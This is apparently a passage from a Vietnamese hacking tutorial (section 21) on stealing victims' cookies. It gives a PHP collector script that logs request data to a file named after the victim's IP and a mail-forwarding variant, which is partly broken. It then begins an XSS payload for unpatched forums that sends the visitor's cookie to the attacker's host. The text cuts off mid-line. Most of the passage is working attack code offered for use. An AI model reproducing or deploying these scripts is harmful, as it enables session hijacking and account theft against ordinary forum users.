21 . ) Kỹ thuật lấy cắp cookie của nạn nhân :
_ Trước hết , các bạn hãy mở notepad rồi chép đoạn mã sau vào notepad đó :
CODE
<?php
define ("LINE", "\r\n");
define ("HTML_LINE", "");
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H:i:s");
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, "");
// file
$file = $REMOTE_ADDR . ".txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
hoặc
CODE
<?php
if ($contents && $header){
mail("victim@yahoo.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
</script>
<?php
} else {
echo "nope";
}
(Bạn hãy sửa cái
victim@yahoo.com thành địa chỉ Mail của bạn ) .
Bạn hãy save cái notepad này với tên “< tên tuỳ các bạn >.php ” ( Nhớ là
phải có .php ) rồi upload lên một host nào đó có hỗ trợ PHP , trong VD của tôi
là abc.php .( Đối với các bạn đã từng làm Web chắc sẽ rất dễ phảI không ?
) . Đoạn mã này sẽ có nhiệm vụ ăn cắp thông tin (và có khi có cả cookie )
của nạn nhân khi họ mở dữ liệu có chứa đoạn mã này rồI tự động save
thông tin đó thành file < ip của nạn nhân >.txt .
_ Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng
chưa fix , khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình :
CODE
document.write('<img src=http://host_php/abc.php?abc='+escape(document
